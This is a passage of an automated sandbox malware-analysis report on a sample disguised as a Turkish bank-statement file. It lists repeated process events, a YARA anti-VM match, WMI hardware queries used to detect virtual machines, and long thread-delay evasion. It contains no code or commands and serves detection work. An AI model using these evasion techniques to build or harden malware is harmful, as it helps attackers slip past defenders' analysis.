                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: hesaphareketi__20241001.exe PID: 5732, type: MEMORYSTR
                  Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeMemory allocated: 15D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeMemory allocated: 3080000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeMemory allocated: 2EC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeMemory allocated: 7F50000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeMemory allocated: 8F50000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeMemory allocated: 9100000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeMemory allocated: A100000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeMemory allocated: A790000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeMemory allocated: B790000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeMemory allocated: C790000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeMemory allocated: 2B60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeMemory allocated: 2D70000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeMemory allocated: 2B60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1200000Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1199828Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1199718Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1199592Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1199484Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1199375Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1199248Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1199140Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1199031Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1198894Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1198734Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1198504Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1198218Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1198020Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1197875Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1197765Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1197656Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1197546Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1197437Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1197328Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1197218Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1197109Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1197000Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1196890Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1196781Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1196672Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1196559Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1196453Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1196343Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1196234Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1196125Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1196015Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1195906Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1195797Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1195687Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1195578Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1195468Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1195359Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1195250Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1195140Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1195031Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1194922Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1194812Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1194703Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1194593Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1194484Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1194374Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1194265Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1194156Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1194047Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1193937Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1193827Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1193718Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1193609Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6786Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2873Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeWindow / User API: threadDelayed 2687Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeWindow / User API: threadDelayed 7152Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 5420Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3304Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -35048813740048126s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1200000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1199828s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1199718s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1199592s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1199484s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1199375s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1199248s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1199140s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1199031s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1198894s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1198734s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1198504s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1198218s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1198020s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1197875s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1197765s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1197656s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1197546s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1197437s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1197328s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1197218s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1197109s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1197000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1196890s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1196781s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1196672s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1196559s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1196453s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1196343s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1196234s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1196125s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1196015s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1195906s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1195797s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1195687s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1195578s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1195468s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1195359s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1195250s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1195140s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1195031s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1194922s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1194812s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1194703s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1194593s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1194484s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1194374s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1194265s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1194156s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1194047s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1193937s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1193827s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1193718s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1193609s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 922337203685477Jump to behavior
